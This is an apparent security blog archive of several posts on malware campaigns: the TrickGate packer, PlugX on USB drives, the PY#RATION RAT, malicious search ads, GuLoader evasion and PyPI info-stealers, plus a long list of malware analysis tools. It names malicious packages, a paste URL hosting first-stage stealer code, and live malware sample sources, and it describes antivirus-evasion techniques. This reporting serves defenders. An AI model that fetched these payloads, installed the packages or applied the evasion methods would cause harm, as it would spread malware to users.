Feb 03 2023

MAJORITY OF THE RANSOMWARE GANGS USED THIS PACKER TO BYPASS ANTIVIRUS AND ENCRYPT DEVICES

Category: Malware,RansomwareDISC @ 11:02 am

Packers are becoming an increasingly important tool for cybercriminals to use in the commission of illegal acts. On hacker forums, the packer is sometimes referred to as “Crypter” and “FUD.” Its primary function is to make it more difficult for antivirus systems to identify malicious code. Malicious actors are able to disseminate their malware more quickly and with fewer consequences when they use a packer. It doesn’t matter what the payload is, which is one of the primary qualities of a commercial Packer-as-a-Service, which implies that it may be used to pack a variety of different harmful samples. This opens up a lot of opportunities for cybercriminals. Another key quality of the packer is that it is transformational. Because the packer’s wrapper is changed on a frequent basis, it is able to avoid detection by devices designed to enhance security.

According to Checkpoint, TrickGate is an excellent illustration of a robust and resilient packer-as-a-service. It has been able to go under the radar of cyber security researchers for a number of years and is consistently becoming better in a variety of different ways.

Although a lot of very good study was done on the packer itself, TrickGate is a master of disguises and has been given a number of different titles due to the fact that it has so many different characteristics. A number of names have been given to it, including “TrickGate,” “Emotet’s packer,” “new loader,” “Loncom,” and “NSIS-based crypter.”

At the end of 2016, they made our first observation of TrickGate. During that time, it was used to spread the Cerber malware. Since that time, they have been doing ongoing research on TrickGate and have discovered that it is used to propagate many forms of malicious software tools, including ransomware, RATs, information thieves, bankers, and miners. It has come to their attention that a significant number of APT organizations and threat actors often employ TrickGate to wrap their malicious code in order to evade detection by security solutions. Some of the most well-known and top-distribution malware families have been wrapped by TrickGate,

including Cerber, Trickbot, Maze, Emotet, REvil, CoinMiner, Cobalt Strike, DarkVNC, BuerLoader, HawkEye, NetWire, AZORult, Formbook, Remcos, Lokibot, AgentTesla, and many more. TrickGate has also been involved in the wrapping of many other malware.

Tags: BYPASS ANTIVIRUS AND ENCRYPT DEVICES


Jan 28 2023

PlugX Malware Sneaks Onto Windows PCs Through USB Devices

Category: Malware,Windows SecurityDISC @ 9:29 am

PlugX malware has been around for almost a decade and has been used by multiple actors of Chinese nexus and several other cybercrime groups.

The Palo Alto Networks Unit 42 incident response team has discovered a new variant of PlugX malware that is distributed via removable USB devices and targets Windows PCs. This should not come as a surprise since 95.6% of new malware or their variants in 2022 targeted Windows.

According to Unit 42 researchers, the new variant was detected when carrying out an incident response post a Black Basta ransomware attack. The researchers uncovered several malware samples and tools on the victims’ devices. This includes the Brute Ratel C4 red-teaming tool, GootLoader malware, and an old PlugX sample.

PlugX malware has been around for almost a decade and has been used by multiple actors of Chinese nexus and several other cybercrime groups. The malware was previously used in many high-profile cyberattacks, such as the 2015 U.S. Government Office of Personnel Management (OPM) breach.

The same backdoor was also used in the 2018 malware attack on the Android devices of minority groups in China. Most recently, in November 2022, researchers linked Google Drive phishing scams to the group infamously known for using PlugX malware.

Scope of Infection

The new variant stood out among other malware because it could infect any attached removable USB device, e.g., floppy, flash, thumb drives, and any system the removable device was plugged into later.

So far, no evidence connects the PlugX backdoor or Gootkit to the Black Basta ransomware group, and researchers believe another actor could have deployed it. Moreover, researchers noted that the malware could copy all Adobe PDF and Microsoft Word documents from the host and places them in a hidden folder on the USB device. The malware itself creates this folder.

PlugX Malware Being Distributed through Removable USB Devices

Malware Analysis

Unit 42 researchers Jen Miller-Osborn and Mike Harbison explained in their blog post that this variant of PlugX malware is a wormable, second-stage implant. It infects USB devices and stays concealed from the Windows operating file system. The user would not suspect that their USB device is being exploited to exfiltrate data from networks. 

PlugX’s USB variant is different because it uses a specific Unicode character called non-breaking space/ U+00A0 to hide files in a USB device plugged into a workstation. This character prevents the Windows OS from rendering the directory name instead of leaving an anonymous folder in Explorer.

Furthermore, the malware can hide actor files in a removable USB device through a novel technique, which even works on the latest Windows OS

The malware is designed to infect the host and copy the malicious code on any removable device connected to the host by hiding it in a recycle bin folder. Since MS Windows OS by default doesn’t show hidden files, the malicious files in recycle bin aren’t displayed, but, surprisingly, it isn’t shown even with the settings enabled. These malicious files can be viewed/downloaded only on a Unix-like OS or through mounting the USB device in a forensic tool.

Mastering Windows Security and Hardening: Secure and protect your Windows environment from intruders, malware attacks, and other cyber threats

InfoSec books | InfoSec tools | InfoSec services

Tags: PlugX Malware


Jan 27 2023

New Python Malware Targeting Windows Devices

Category: Malware,PythonDISC @ 10:26 am

The malware features also include file transfer, keylogging, stealing passwords stored in the browser, clipboard data stealing, cookies exfiltration and more.

Threat analysis firm Securonix’s cybersecurity researchers have discovered a new malware dubbed PY#RATION allowing attackers to steal sensitive files and log keystrokes from impacted devices.

Malware Distribution Technique

The malware is distributed through a conventional phishing mechanism in which the email contains a password-protected ZIP archive. When it is unpacked, two shortcut image files appear, titled front.jpg.lkn and back.jpg.lnk. When launched, these files display the front and back of a driver’s license that doesn’t exist.

New Python Malware Targeting Windows Devices
Images used in the scam (Credit: Securonix)

With this, the malicious code is also executed, leading to two new files being downloaded from the internet. These files are titled front.txt and back.txt, later renamed to .bat docs and executed. The malware disguises itself as Cortana virtual assistant to ensure persistence on the system.

What is PY#RATION

PY#RATION is a Python-based malware that displays a RAT (remote access trojan) like behaviour to sustain control over the affected host. The malware has various capabilities and functionalities, such as keylogging and data exfiltration.

However, the unique aspect is that it uses WebSocket for exfiltration and C2 communication, and evades detection from network security solutions and antivirus programs. Leveraging Python’s built-in Socket.IO framework that facilitates client and server WebSocket communications, the malware pulls data and gets commands over a single TCP connection through open ports simultaneously.

Moreover, according to a blog post published by Securonix, the attackers use the same C2 address, which the IPVoid checking system is yet to block. Researchers believe this malware is still under active development as they have detected multiple versions since August 2022. The malware receives instructions from the operations through WebSocket and obtains sensitive data.

Potential Dangers

This Python RAT is packed into an executable that uses automated packers such as ‘pyinstaller’ and ‘py2exe’ to convert Python code into Windows executables. This helps inflate payload size (The first detected version 1.0 being 14MB and the last detected version 1.6.0 being 32 MB containing 1000+ lines and additional code).

New Python Malware Targeting Windows Devices
Infection chain of the PY#RATION python malware (Credit: Securonix)

Researchers claim that the latest version of the payload remains undetected by all except for one antivirus engine listed on VirusTotal.

The malware features include file transfer to and from the C2 server, network enumeration, shell command execution, keylogging, stealing passwords stored in the browser, host enumeration, clipboard data stealing, and cookies exfiltration. Who’s behind this campaign, the distribution volume, and campaign objectives are still unclear.

Python for Cybersecurity: Using Python for Cyber Offense and Defense


InfoSec books
 | InfoSec tools | InfoSec services

Tags: Python Malware


Jan 19 2023

Google ads increasingly pointing to malware

Category: MalwareDISC @ 11:13 am

The FBI has recently warned the public about search engine ads pushing malware disguised as legitimate software – an old tactic that has lately resulted in too many malicious ads served to users searching for software, cracked software, drivers – anything that can be downloaded, really – via Google and Bing.

The recent explosion of search engine malvertising

Malware peddlers employ a variety of methods to deliver their wares to unsuspecting users:

The latter tactic is particularly good at hitting a wide pool of potential targets, since most internet users also use search engines.

Lately, though, they have been overdoing it – or perhaps it’s just that more people have begun noticing it and talking about it online?

Many documented campaigns

HP threat researcher Patrick SchlĂ€pfer says that they have seen “a significant increase in malware distributed through malvertising, with multiple threat actors currently using this technique.”

Some of these campaigns have been going on since late last year, and mostly target users searching to download popular software (e.g., Audacity, Blender 3D, GIMP, Notepad++, Microsoft Teams, Discord, Microsoft OneNote, 7zip, OBS, etc.).

malicious Google ads

The malicious ads often manage to be the first link users see when searching for software on Google, and point to a (usually typosquatting) domain that resembles the original software manufacturer’s page. Clicking on the download link triggers the download of the malicious package from a file-hosting and sharing service (e.g., Dropbox), an app development platform (e.g., Google Firebase), or a code-hosting service (e.g., GitHub).

Protect yourself and your loved ones

While Google and Microsoft are trying to keep their users safe, it’s becoming obvious that they are failing to keep pace with the rapid change of tricks employed by cybercriminals to push those ads.

As some ads are removed and new ones inevitably spring up, we are forced to do what we can to protect themselves.

Just being aware of this danger and knowing about the prevalence of these malicious ads will help. Also, carefully check whether the URL to which the advertisement points is the correct one (e.g., by comparing it with the official domain listed on the software’s Wikipedia page).

If you fail to spot the malicious nature of the ad and the typosquatting site, don’t ignore warnings you might get from Microsoft Defender or another security solution you use.

malicious Google ads

But the best advice may be to completely avoid clicking on Google and Bing ads – either by recognizing them and avoiding them consciously, or by installing an ad-blocking extension that will stop those ads from being displayed. That latter option is perhaps the best one for less tech-savvy users, to completely remove the temptation of willy-nilly clicking on potentially malicious ads – wherever they might pop up.

Google and Microsoft, on the other hand, may want to ramp up their efforts to block this kind of abuse of their ad network, or risk their reputation being dented and more and more users start using ad blockers.

Learn Malware Removal Techniques: How to remove malwares from a computer

Checkout our previous posts on “Malware” topic

InfoSec books | InfoSec tools | InfoSec services

Tags: Google ads


Jan 07 2023

Best Malware Analysis Tools List For Security Researchers & Malware Analyst 2023

Category: Malware,Security ToolsDISC @ 1:24 pm

Malware analysis tools are highly essential for Security Professionals who always need to learn many tools, techniques, and concepts to analyze sophisticated Threats and current cyber attacks.

Most Important Security Tools and Resources For Security Researcher and Malware Analyst

Malware Analysis Tools & Courses

  • Malware Analysis Courses
  • Hex Editors
  • Disassemblers
  • Detection and Classification
  • Dynamic Binary Instrumentation
  • Dynamic Analysis
  • Deobfuscation
  • Debugging
  • Malware Analaysis Courses
  • Reverse Engineering
  • Binary Analysis
  • Decompiler
  • Bytecode Analysis
  • Reconstruction
  • Memory Forensics
  • Windows Artifacts
  • Storage and Workflow
  • Malware samples
  • Courses
  • Domain Analysis
  • Books

Malware Analysis Courses

Here we have listed the best courses list for malware analysis, reverse engineering, exploit development and more..

Hex Editors

A hex editor (or binary file editor or byteeditor) is a type of computer program that allows for manipulation of the fundamental binary data that constitutes a computer file. The name ‘hex’ comes from ‘hexadecimal’: a standard numerical format for representing binary data.

Disassemblers 

disassembler is a computer program that translates machine language into assembly language—the inverse operation to that of an assembler.

A disassembler differs from a decompiler, which targets a high-level language rather than an assembly language. Disassembly, the output of a disassembler, is often formatted for human-readability rather than suitability for input to an assembler, making it principally a reverse-engineering tool.

Detection and Classification

  • AnalyzePE â€“ Wrapper for a variety of tools for reporting on Windows PE files.
  • Assemblyline â€“ A scalable distributed file analysis framework.
  • BinaryAlert â€“ An open source, serverless AWS pipeline that scans and alerts on uploaded files based on a set of YARA rules.
  • ClamAV â€“ Open source antivirus engine.
  • Detect-It-Easy â€“ A program for determining types of files.
  • ExifTool â€“ Read, write and edit file metadata.
  • File Scanning Framework â€“ Modular, recursive file scanning solution.
  • hashdeep â€“ Compute digest hashes with a variety of algorithms.
  • Loki â€“ Host based scanner for IOCs.
  • Malfunction â€“ Catalog and compare malware at a function level.
  • MASTIFF â€“ Static analysis framework.
  • MultiScanner â€“ Modular file scanning/analysis framework
  • nsrllookup â€“ A tool for looking up hashes in NIST’s National Software Reference Library database.
  • packerid â€“ A cross-platform Python alternative to PEiD.
  • PEV â€“ A multiplatform toolkit to work with PE files, providing feature-rich tools for proper analysis of suspicious binaries.
  • Rootkit Hunter â€“ Detect Linux rootkits.
  • ssdeep â€“ Compute fuzzy hashes.
  • totalhash.py â€“ Python script for easy searching of the TotalHash.cymru.com database.
  • TrID â€“ File identifier.
  • YARA â€“ Pattern matching tool for analysts.
  • Yara rules generator â€“ Generate yara rules based on a set of malware samples. Also contains a good strings DB to avoid false positives

Dynamic Binary Instrumentation

Dynamic Binary Instrumentation Tools

Mac Decrypt

Mac Decrypting Tools

Emulator

Emulator Tools

Document Analysis

Document Based Malware Analysis Tools.

Dynamic Analysis

This introductory malware dynamic analysis class is dedicated to people who are starting to work on malware analysis or who want to know what kinds of artifacts left by malware can be detected via various tools.

The class will be a hands-on class where students can use various tools to look for how malware is: Persisting, Communicating, and Hiding

Deobfuscation Malware Analysis Tools

Reverse XOR and other code obfuscation methods.

  • Balbuzard â€“ A malware analysis tool for reversing obfuscation (XOR, ROL, etc) and more.
  • de4dot â€“ .NET deobfuscator and unpacker.
  • ex_pe_xor & iheartxor â€“ Two tools from Alexander Hanel for working with single-byte XOR encoded files.
  • FLOSS â€“ The FireEye Labs Obfuscated String Solver uses advanced static analysis techniques to automatically deobfuscate strings from malware binaries.
  • NoMoreXOR â€“ Guess a 256 byte XOR key using frequency analysis.
  • PackerAttacker â€“ A generic hidden code extractor for Windows malware.
  • unpacker â€“ Automated malware unpacker for Windows malware based on WinAppDbg.
  • unxor â€“ Guess XOR keys using known-plaintext attacks.
  • VirtualDeobfuscator â€“ Reverse engineering tool for virtualization wrappers.
  • XORBruteForcer â€“ A Python script for brute forcing single-byte XOR keys.
  • XORSearch & XORStrings â€“ A couple programs from Didier Stevens for finding XORed data.
  • xortool â€“ Guess XOR key length, as well as the key itself.

Debugging

IN this List we could  see the tools for Disassemblers, debuggers, and other static and dynamic analysis tools.Cross-Platform Debugging Tools

Windows-Only Debugging Tools

Linux-Only Debugging Tools

Reverse Engineering 

  • angr â€“ Platform-agnostic binary analysis framework developed at UCSB’s Seclab.
  • bamfdetect â€“ Identifies and extracts information from bots and other malware.
  • BAP â€“ Multiplatform and open source (MIT) binary analysis framework developed at CMU’s Cylab.
  • BARF â€“ Multiplatform, open source Binary Analysis and Reverse engineering Framework.
  • binnavi â€“ Binary analysis IDE for reverse engineering based on graph visualization.
  • Binary ninja â€“ A reversing engineering platform that is an alternative to IDA.
  • Binwalk â€“ Firmware analysis tool.
  • Bokken â€“ GUI for Pyew and Radare. (mirror)
  • Capstone â€“ Disassembly framework for binary analysis and reversing, with support for many architectures and bindings in several languages.
  • codebro â€“ Web based code browser using  clang to provide basic code analysis.
  • DECAF (Dynamic Executable Code Analysis Framework) â€“ A binary analysis platform based   on QEMU. DroidScope is now an extension to DECAF.
  • dnSpy â€“ .NET assembly editor, decompiler and debugger.
  • Evan’s Debugger (EDB) â€“ A modular debugger with a Qt GUI.
  • Fibratus â€“ Tool for exploration and tracing of the Windows kernel.
  • FPort â€“ Reports open TCP/IP and UDP ports in a live system and maps them to the owning application.
  • GDB â€“ The GNU debugger.
  • GEF â€“ GDB Enhanced Features, for exploiters and reverse engineers.
  • hackers-grep â€“ A utility to search for strings in PE executables including imports, exports, and debug symbols.
  • Hopper â€“ The macOS and Linux Disassembler.
  • IDA Pro â€“ Windows disassembler and debugger, with a free evaluation version.
  • Immunity Debugger â€“ Debugger for malware analysis and more, with a Python API.
  • ILSpy â€“ ILSpy is the open-source .NET assembly browser and decompiler.
  • Kaitai Struct â€“ DSL for file formats / network protocols / data structures reverse engineering and dissection, with code generation for C++, C#, Java, JavaScript, Perl, PHP, Python, Ruby.
  • LIEF â€“ LIEF provides a cross-platform library to parse, modify and abstract ELF, PE and MachO formats.
  • ltrace â€“ Dynamic analysis for Linux executables.
  • objdump â€“ Part of GNU binutils, for static analysis of Linux binaries.
  • OllyDbg â€“ An assembly-level debugger for Windows executables.
  • PANDA â€“ Platform for Architecture-Neutral Dynamic Analysis.
  • PEDA â€“ Python Exploit Development Assistance for GDB, an enhanced display with added commands.
  • pestudio â€“ Perform static analysis of Windows executables.
  • Pharos â€“ The Pharos binary analysis framework can be used to perform automated static analysis of binaries.
  • plasma â€“ Interactive disassembler for x86/ARM/MIPS.
  • PPEE (puppy) â€“ A Professional PE file Explorer for reversers, malware researchers and those who want to statically inspect PE files in more detail.
  • Process Explorer â€“ Advanced task manager for Windows.
  • Process Hacker â€“ Tool that monitors system resources.
  • Process Monitor â€“ Advanced monitoring tool for Windows programs.
  • PSTools â€“ Windows command-line tools that help manage and investigate live systems.
  • Pyew â€“ Python tool for malware analysis.
  • PyREBox â€“ Python scriptable reverse engineering sandbox by the Talos team at Cisco.
  • QKD â€“ QEMU with embedded WinDbg server for stealth debugging.
  • Radare2 â€“ Reverse engineering framework, with debugger support.
  • RegShot â€“ Registry compare utility that compares snapshots.
  • RetDec â€“ Retargetable machine-code decompiler with an online decompilation service and API that you can use in your tools.
  • ROPMEMU â€“ A framework to analyze, dissect and decompile complex code-reuse attacks.
  • SMRT â€“ Sublime Malware Research Tool, a plugin for Sublime 3 to aid with malware analyis.
  • strace â€“ Dynamic analysis for Linux executables.
  • Triton â€“ A dynamic binary analysis (DBA) framework.
  • Udis86 â€“ Disassembler library and tool for x86 and x86_64.
  • Vivisect â€“ Python tool for malware analysis.
  • WinDbg â€“ multipurpose debugger for the Microsoft Windows computer operating system, used to debug user mode applications, device drivers, and the kernel-mode memory dumps.
  • X64dbg â€“ An open-source x64/x32 debugger for windows.

Binary Format and  Binary Analysis

The Compound File Binary Format is the basic container used by several different Microsoft file formats such as Microsoft Office documents and Microsoft Installer packages.

Binary Analysis Resources

 

Decompiler 

A decompiler is a computer program that takes an executable file as input, and attempts to create a high level source file which can be recompiled successfully. It is therefore the opposite of a compiler, which takes a source file and makes an executable.Generic Decompiler

Java Decompiler

.NET Decompiler

Delphi Decompiler

Python Decompiler

Bytecode Analysis

Bytecode Analysis Tools

Malware Analysis Tools for Reconstruction

Import Reconstruction Tools

  • AndroTotal â€“ Free online analysis of APKs against multiple mobile antivirus apps.
  • AVCaesar â€“ Malware.lu online scanner and malware repository.
  • Cryptam â€“ Analyze suspicious office documents.
  • Cuckoo Sandbox â€“ Open source, self hosted sandbox and automated analysis system.
  • cuckoo-modified â€“ Modified version of Cuckoo Sandbox released under the GPL. Not merged upstream due to legal concerns by the author.
  • cuckoo-modified-api â€“ A Python API used to control a cuckoo-modified sandbox.
  • DeepViz â€“ Multi-format file analyzer with machine-learning classification.
  • detux â€“ A sandbox developed to do traffic analysis of Linux malwares and capturing IOCs.
  • DRAKVUF â€“ Dynamic malware analysis system.
  • firmware.re â€“ Unpacks, scans and analyzes almost any firmware package.
  • HaboMalHunter â€“ An Automated Malware Analysis Tool for Linux ELF Files.
  • Hybrid Analysis â€“ Online malware analysis tool, powered by VxSandbox.
  • IRMA â€“ An asynchronous and customizable analysis platform for suspicious files.
  • Joe Sandbox â€“ Deep malware analysis with Joe Sandbox.
  • Jotti â€“ Free online multi-AV scanner.
  • Limon â€“ Sandbox for Analyzing Linux Malware.
  • Malheur â€“ Automatic sandboxed analysis of malware behavior.
  • malsub â€“ A Python RESTful API framework for online malware and URL analysis services.
  • Malware config â€“ Extract, decode and display online the configuration settings from common malwares.
  • Malwr â€“ Free analysis with an online Cuckoo Sandbox instance.
  • MASTIFF Online â€“ Online static analysis of malware.
  • Metadefender.com â€“ Scan a file, hash or IP address for malware (free).
  • NetworkTotal â€“ A service that analyzes pcap files and facilitates the quick detection of viruses, worms, trojans, and all kinds of malware using Suricata configured with EmergingThreats Pro.
  • Noriben â€“ Uses Sysinternals Procmon to collect information about malware in a sandboxed environment.
  • PDF Examiner â€“ Analyse suspicious PDF files.
  • ProcDot â€“ A graphical malware analysis tool kit.
  • Recomposer â€“ A helper script for safely uploading binaries to sandbox sites.
  • Sand droid â€“ Automatic and complete Android application analysis system.
  • SEE â€“ Sandboxed Execution Environment (SEE) is a framework for building test automation in secured Environments.
  • VirusTotal â€“ Free online analysis of malware samples and URLs
  • Visualize_Logs â€“ Open source visualization library and command line tools for logs. (Cuckoo, Procmon, more to come
)
  • Zeltser’s List â€“ Free automated sandboxes and services, compiled by Lenny Zeltser.

Document Analysis

Document Analysis Tools

Scripting

Scripting

Android

Android tools

Yara

Yara Resources

Memory Forensics Malware Analysis Tools 

Tools for dissecting malware in memory images or running systems.

  • BlackLight â€“ Windows/MacOS forensics client supporting hiberfil, pagefile, raw memory analysis.
  • DAMM â€“ Differential Analysis of Malware in Memory, built on Volatility.
  • evolve â€“ Web interface for the Volatility Memory Forensics Framework.
  • FindAES â€“ Find AES encryption keys in memory.
  • inVtero.net â€“ High speed memory analysis framework developed in .NET supports all Windows x64, includes code integrity and write support.
  • Muninn â€“ A script to automate portions of analysis using Volatility, and create a readable report.
  • Rekall â€“ Memory analysis framework, forked from Volatility in 2013.
  • TotalRecall â€“ Script based on Volatility for automating various malware analysis tasks.
  • VolDiff â€“ Run Volatility on memory images before and after malware execution, and report changes.
  • Volatility â€“ Advanced memory forensics framework.
  • VolUtility â€“ Web Interface for Volatility Memory Analysis framework.
  • WDBGARK â€“ WinDBG Anti-RootKit Extension.
  • WinDbg â€“ Live memory inspection and kernel debugging for Windows systems.

Windows Artifacts

  • AChoir â€“ A live incident response script for gathering Windows artifacts.
  • python-evt â€“ Python library for parsing Windows Event Logs.
  • python-registry â€“ Python library for parsing registry files.
  • RegRipper (GitHub) â€“ Plugin-based registry analysis tool.

Storage and Workflow

  • Aleph â€“ Open Source Malware Analysis Pipeline System.
  • CRITs â€“ Collaborative Research Into Threats, a malware and threat repository.
  • FAME â€“ A malware analysis framework featuring a pipeline that can be extended with custom modules, which can be chained and interact with each other to perform end-to-end analysis.
  • Malwarehouse â€“ Store, tag, and search malware.
  • Polichombr â€“ A malware analysis platform designed to help analysts to reverse malwares collaboratively.
  • stoQ â€“ Distributed content analysis framework with extensive plugin support, from input to output, and everything in between.
  • Viper â€“ A binary management and analysis framework for analysts and researchers.

Malware samples

Malware samples collected for analysis.

  • Clean MX â€“ Realtime database of malware and malicious domains.
  • Contagio â€“ A collection of recent malware samples and analyses.
  • Exploit Database â€“ Exploit and shellcode samples.
  • Malshare â€“ Large repository of malware actively scrapped from malicious sites.
  • MalwareDB â€“ Malware samples repository.
  • Open Malware Project â€“ Sample information and downloads. Formerly Offensive Computing.
  • Ragpicker â€“ Plugin based malware crawler with pre-analysis and reporting functionalities
  • theZoo â€“ Live malware samples for analysts.
  • Tracker h3x â€“ Agregator for malware corpus tracker and malicious download sites.
  • ViruSign â€“ Malware database that detected by many anti malware programs except ClamAV.
  • VirusShare â€“ Malware repository, registration required.
  • VX Vault â€“ Active collection of malware samples.
  • Zeltser’s Sources â€“ A list of malware sample sources put together by Lenny Zeltser.
  • Zeus Source Code â€“ Source for the Zeus trojan leaked in 2011.

Domain Malware Analysis Tools

Inspect domains and IP addresses.

  • badips.com â€“ Community based IP blacklist service.
  • boomerang â€“ A tool designed for consistent and safe capture of off network web resources.
  • Cymon â€“ Threat intelligence tracker, with IP/domain/hash search.
  • Desenmascara.me– One click tool to retrieve as much metadata as possible for a website and to assess its good standing.
  • Dig â€“ Free online dig and other network tools.
  • dnstwist â€“ Domain name permutation engine for detecting typo squatting, phishing and corporate espionage.
  • IPinfo â€“ Gather information about an IP or domain by searching online resources.
  • Machinae â€“ OSINT tool for gathering information about URLs, IPs, or hashes. Similar to Automator.
  • mailchecker â€“ Cross-language temporary email detection library.
  • MaltegoVT â€“ Maltego transform for the VirusTotal API. Allows domain/IP research, and searching for file hashes and scan reports.
  • Multi rbl â€“ Multiple DNS blacklist and forward confirmed reverse DNS lookup over more than 300 RBLs.
  • NormShield Services â€“ Free API Services for detecting possible phishing domains, blacklisted ip addresses and breached accounts.
  • SpamCop â€“ IP based spam block list.
  • SpamHaus â€“ Block list based on domains and IPs.
  • Sucuri SiteCheck â€“ Free Website Malware and Security Scanner.
  • Talos Intelligence â€“ Search for IP, domain or network owner. (Previously SenderBase.)
  • TekDefense Automater â€“ OSINT tool for gathering information about URLs, IPs, or hashes.
  • URLQuery â€“ Free URL Scanner.
  • Whois â€“ DomainTools free online whois search.
  • Zeltser’s List â€“ Free online tools for researching malicious websites, compiled by Lenny Zeltser.
  • ZScalar Zulu â€“ Zulu URL Risk Analyzer.

Books 

Most Important books Reverse Engineering Books

Documents and Shellcode

Analyze malicious JS and shellcode from PDFs and Office documents. See also the browser malware section.

  • AnalyzePDF â€“ A tool for analyzing PDFs and attempting to determine whether they are malicious.
  • box-js â€“ A tool for studying JavaScript malware, featuring JScript/WScript support and ActiveX emulation.
  • diStorm â€“ Disassembler for analyzing malicious shellcode.
  • JS Beautifier â€“ JavaScript unpacking and deobfuscation.
  • JS Deobfuscator â€“ Deobfuscate simple Javascript that use eval or document.write to conceal its code.
  • libemu â€“ Library and tools for x86 shellcode emulation.
  • malpdfobj â€“ Deconstruct malicious PDFs into a JSON representation.
  • OfficeMalScanner â€“ Scan for malicious traces in MS Office documents.
  • olevba â€“ A script for parsing OLE and OpenXML documents and extracting useful information.
  • Origami PDF â€“ A tool for analyzing malicious PDFs, and more.
  • PDF Tools â€“ pdfid, pdf-parser, and more from Didier Stevens.
  • PDF X-Ray Lite â€“ A PDF analysis tool, the backend-free version of PDF X-RAY.
  • peepdf â€“ Python tool for exploring possibly malicious PDFs.
  • QuickSand â€“ QuickSand is a compact C framework to analyze suspected malware documents to identify exploits in streams of different encodings and to locate and extract embedded executables.
  • Spidermonkey â€“ Mozilla’s JavaScript engine, for debugging malicious JS.

Practice Malware Analysis Tools 

Practice Reverse Engineering. Be careful with malware.

Open Source Threat Intelligence Tool

Harvest and analyze IOCs.

  • AbuseHelper â€“ An open-source framework for receiving and redistributing abuse feeds and threat intel.
  • AlienVault Open Threat Exchange â€“ Share and collaborate in developing Threat Intelligence.
  • Combine â€“ Tool to gather Threat Intelligence indicators from publicly available sources.
  • Fileintel â€“ Pull intelligence per file hash.
  • Hostintel â€“ Pull intelligence per host.
  • IntelMQ â€“ A tool for CERTs for processing incident data using a message queue.
  • IOC Editor– A free editor for XML IOC files.
  • ioc_writer â€“ Python library for working with OpenIOC objects, from Mandiant.
  • Massive Octo Spice â€“ Previously known as CIF (Collective Intelligence Framework). Aggregates IOCs from various lists. Curated by the CSIRT Gadgets Foundation.
  • MISP â€“ Malware Information Sharing Platform curated by The MISP Project.
  • Pulsedive â€“ Free, community-driven threat intelligence platform collecting IOCs from open-source feeds.
  • PyIOCe â€“ A Python OpenIOC editor.
  • RiskIQ â€“ Research, connect, tag and share IPs and domains. (Was PassiveTotal.)
  • threataggregator â€“ Aggregates security threats from a number of sources, including some of those listed below in other resources.
  • ThreatCrowd â€“ A search engine for threats, with graphical visualization.
  • ThreatTracker â€“ A Python script to monitor and generate alerts based on IOCs indexed by a set of Google Custom Search Engines.
  • TIQ-test â€“ Data visualization and statistical analysis of Threat Intelligence feeds.

Other Resources

Credits

This list is Created with helping of following Awesome Peoples.

Infosec books | InfoSec tools | InfoSec services

Tags: malware analysis tools


Dec 29 2022

GuLoader Malware Uses Advanced Anti-Analysis Techniques to Evade Detection

Category: Antivirus,Malware,Threat detectionDISC @ 11:30 am

An advanced malware downloader named GuLoader has recently been exposed by cybersecurity researchers at CrowdStrike. This advanced downloader has the capability to evade the detection of security software by adopting a variety of techniques.

While analyzing the shellcode of GuLoader, a brand-new anti-analysis technique was discovered by CrowdStrike through which researchers would be able to identify if the malware is operating in an adversarial environment or not. While this is done by examining the whole process memory for any VM-related strings.

Evolution of GuLoader Malware

On infected machines, GuLoader (aka CloudEyE) distributes remote access trojans like AgentTeslaFormBookNanocoreNETWIRERemcos, and the Parallax RAT using the VBS downloader. 

GuLoader has been active since at least 2019 and has undergone several changes in its functionality and delivery methods. Over time, the malware has become more sophisticated, using various methods to evade detection and avoid being removed from infected systems. 

It has also been distributed through other channels, such as exploit kits and hacked websites. While it has evolved over time and has been used in various campaigns to deliver a range of malware, including ransomware, banking Trojans, and other types of malware.

A strong anti-analysis technique was also deployed by GuLoader in order to avoid detection in order to remain undetected. 

GuLoader exhibits a three-stage process, the VBScript script will first inject the shellcode embedded within it into the memory, then the next stage of the process will execute anti-analysis checks that will protect the code from being analyzed.

Furthermore, the shellcode also incorporates the same anti-analysis methods in order to avoid detection by third parties. It is through this shellcode that an attacker is able to download a final payload of their choice and execute it with the same anti-analysis methods as the original shellcode on the host that is compromised.

Detecting breakpoints used for code analysis is done with anti-debugging and anti-disassembling checks in the malware.

There is also a redundant code injection mechanism that can be used to avoid the use of a NTDLL.dll hook that is commonly used by antivirus programs and EDRs.

In order to detect and flag processes on Windows that may be suspicious, anti-malware engines use NTDLL.dll API hooking. 

Anti-Analysis Techniques

Here below we have mentioned the anti-analysis techniques used:-

  • Anti-Debugging
  • Anti-Virtual Machine
  • Process Hollowing

It was pointed out by experts that GuLoader remains a treacherous threat that is constantly evolving as it continues to develop. Furthermore, experts also provided indicators of compromise for the latest version of the downloader, as well as other key information.

GuLoader Malware Advanced Anti-Analysis

Antivirus Bypass Techniques: Learn practical techniques and tactics to combat, bypass, and evade antivirus software

Malware Analysis

Infosec books | InfoSec tools | InfoSec services

Tags: Antivirus Bypass Techniques, Evade Detection, Malware


Dec 27 2022

Hackers Deploy New Information Stealer Malware onto Python Developers’ Machines

Category: Malware,PythonDISC @ 10:48 am

Researchers at Phylum recently discovered that hackers had been injecting information stealer malware into Python developers’ machines in order to steal their information.

As they dug deeper, they discovered a new stealer variant with many different names. While apart from this, the source code of the program reveals that it is a straightforward copy of the old Stealer, W4SP. 

Attack Chain to Deploy Malware

A stealer in this case dropped directly into the main.py file rather than obfuscating the code or being obvious about the attempts to escape detection.

Only one instance has been found in which multiple stages were used in order to obfuscate and obscure the attacker’s intentions. In this case, the attacker used a package called chazz to pull obfuscated code from the klgrth.io website, using a simple first stage to get it.

There is a great deal of similarity between the first stage of the stealer code and the injector code. While this has been obfuscated with BlankOBF, it’s an obfuscation program. As soon as it is de-obfuscated, it reveals the Leaf $tealer.

Malicious Packages

Listed below are packages that feature similar IOC and apart from this, what we can expect is this list will grow over the coming months and years:-

  • modulesecurity â€“ “Celestial Stealer”
  • informmodule â€“ “Leaf $tealer”
  • chazz â€“ first stage that pull from https://www.klgrth.io/paste/j2yvv/raw which contains the obfuscated code shown above
  • randomtime â€“ “ANGEL stealer”
  • proxygeneratorbil â€“ “@skid STEALER”
  • easycordey â€“ “@skid Stealer”
  • easycordeyy â€“ “@skid Stealer”
  • tomproxies â€“ “@skid STEALER”
  • sys-ej â€“ “Hyperion Obfuscated code”
  • infosys â€“ “@734 Stealer”
  • sysuptoer â€“ “BulkFA Stealer”
  • nowsys â€“ “ANGEL Stealer”
  • upamonkws â€“ “PURE Stealer”
  • captchaboy â€“ “@skid STEALER”
  • proxybooster â€“ “Fade Stealer”

W4SP Copies

W4SP’s original publication in loTus’s repository has been disabled by GitHub staff due to the violation of the T&C of GitHub, and as a result, it will be not found anymore.

